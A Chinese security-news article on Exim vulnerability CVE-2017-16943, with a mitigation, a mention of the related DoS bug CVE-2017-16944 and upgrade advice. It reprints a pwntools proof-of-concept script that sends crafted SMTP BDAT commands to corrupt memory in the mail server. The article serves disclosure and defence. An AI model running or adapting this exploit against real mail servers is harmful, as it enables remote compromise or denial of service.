当前位置:主页>资 讯>安全动态>

互联网半数邮件服务器可被远程代码执行,超40万台服务器受影响

  台湾安全公司 DEVCORE 的研究人员 Meh 于近期发现互联网邮件传输代理(MTA)软件 Exim 存在一处关键漏洞(CVE-2017-16943),允许黑客向 SMTP 服务器发送 BDAT 命令,从而触发漏洞后远程执行任意代码。调查显示,有超过 40 万台服务器的分块功能已遭该漏洞影响。
 


 

  Exim 是剑桥大学开发的一款基于 GPL 协议的开放源代码软件,其主要用于连接互联网 Unix 系统的消息传输代理(MTA)服务器。目前,据三月份进行的一百多万台邮件服务器的分析表明,超过 56% 的用户正在使用 Exim 软件。

  调查显示,该漏洞由一台公共bug跟踪器检测发现并在补丁发布之前意外披露。一旦黑客恶意利用,其系统将会处于崩溃状态,因为该函数指针的receive_getc并未被重置。以下是该漏洞部分概念验证代码(PoC)显示:

  # pip install pwntools

  from pwn import *

  r = remote(‘localhost’, 25)

  r.recvline()

  r.sendline(“EHLO test”)

  r.recvuntil(“250 HELP”)

  r.sendline(“MAIL FROM:”)

  r.recvline()

  r.sendline(“RCPT TO:”)

  r.recvline()

  #raw_input()

  r.sendline(‘a’*0x1100+’\x7f’)

  #raw_input()

  r.recvuntil(‘command’)

  r.sendline(‘BDAT 1’)

  r.sendline(‘:BDAT \x7f’)

  s = ‘a’*6 + p64(0xdeadbeef)*(0x1e00/8)

  r.send(s+ ‘:\r\n’)

  r.recvuntil(‘command’)

  #raw_input()

  r.send(‘\n’)

  r.interactive()

  exit()

  虽然跟踪器会警示 Exim 软件存在漏洞,但根据用户习惯来看告警通知极有可能被忽略。不过,现开发人员已采取安全措施防止此类事件恶意发展,并提醒运行 Exim 4.88 或更高版本的用户将其主要配置参数 chunking_advertise_hosts 设置为空值,从而禁用 ESMTP 扩展、使 BDAT 无法使用,以便关闭易受攻击程序。

  另外,研究人员发现的另一个漏洞(CVE-2017-16944)能够允许黑客利用 BDAT 命令与恶意函数远程开展拒绝服务(DoS)攻击。该漏洞影响了 Exim 4.88 和 4.89 中的 SMTP 后台进程。对此,研究人员建议系统管理人员尽快更新至 Exim 4.90 版本,以防可能的黑客恶意攻击。

(责任编辑:宋编辑)

分享到:

更多
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
  • 微笑/wx
  • 撇嘴/pz
  • 抓狂/zk
  • 流汗/lh
  • 大兵/db
  • 奋斗/fd
  • 疑问/yw
  • 晕/y
  • 偷笑/wx
  • 可爱/ka
  • 傲慢/am
  • 惊恐/jk
用户名: 验证码:点击我更换图片
资料下载专区
图文资讯

互联网半数邮件服务器可被远程代码执行,超

互联网半数邮件服务器可被远程代码执行,超40万台服务器受影响

台湾安全公司 DEVCORE 的研究人员 Meh 于近期发现互联网邮件传输代理(MTA)软件 Exim ...[详细]

又一波170万用户email和密码泄露事件

又一波170万用户email和密码泄露事件

 国外知名照片分享网站Imgur,现在终于承认早在2014年曾遭受过一次重大的网络攻击,...[详细]

苹果新macOS系统曝出漏洞:无需密码即可解

苹果新macOS系统曝出漏洞:无需密码即可解锁电脑

北京时间11月29日凌晨消息,苹果公司最新的macOS系统出现严重漏洞,用户仅输入“root...[详细]

黑客组织Cobalt利用Offic 漏洞针对全球银行

黑客组织Cobalt利用Offic 漏洞针对全球银行等金融机构展开网络钓鱼攻击

网络安全公司Reversing Lab 研究人员最新发现黑客组织Cobalt正通过微软近期披露的Offi...[详细]

新型攻击技术Golden SAML:可伪造企业信息

新型攻击技术Golden SAML:可伪造企业信息窃取云应用资源

网络安全公司CyberArk Labs研究人员于近期设计了一种新型入侵攻击技术Golden SAML,允...[详细]

返回首页 返回顶部